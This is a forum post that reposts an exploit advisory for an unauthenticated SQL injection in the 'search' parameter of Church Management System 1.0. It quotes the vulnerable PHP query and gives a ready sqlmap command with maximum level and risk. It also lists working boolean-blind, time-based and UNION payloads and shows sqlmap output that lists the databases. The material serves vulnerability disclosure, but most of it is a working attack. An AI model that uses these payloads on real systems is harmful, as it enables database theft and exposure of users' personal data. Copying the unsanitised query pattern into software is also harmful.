Viewing 1 post (of 1 total)
  • Author
  • #963

    # Vendor Homepage:
    # Software Link:
    # Vendor: oretnom23
    # Version: v1.0
    # Tested on: Linux, Apache, Mysql
    # Exploit Description:
    Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in ‘search’ parameter allowing remote attackers to dump the SQL database using SQL Injection attack.

    # Vulnerable Code
    In search.php on line 28
    $count_all = $conn->query(“SELECT b.*,concat(u.firstname,’ ‘,u.lastname) as author FROM blogs b inner join users u on b.author_id = where b.status =1 and (b.title LIKE ‘%{$_GET[‘search’]}%’ OR b.meta_description LIKE ‘%{$_GET[‘search’]}%’ OR b.keywords LIKE ‘%{$_GET[‘search’]}%’ OR b.content LIKE ‘%{$_GET[‘search’]}%’ )”)->num_rows;

    Sqlmap command:
    sqlmap -u ‘http://localhost/church_management/?p=search&search=abcsw’ -p search –level=5 –risk=3 –dbs –random-agent –eta –batch


    Parameter: search (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind – WHERE or HAVING clause (NOT)
    Payload: p=search&search=abcsw’) OR NOT 4306=4306– rFTu

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=search&search=abcsw’) AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)– zpac

    Type: UNION query
    Title: Generic UNION query (NULL) – 14 columns
    Payload: p=search&search=abcsw’) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL– –

    [17:33:38] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian
    web application technology: Apache 2.4.46, PHP
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    [17:33:38] [INFO] fetching database names
    available databases [4]:
    [*] church_db
    [*] information_schema
    [*] mysql
    [*] performance_schema

Viewing 1 post (of 1 total)

You must be logged in to reply to this topic.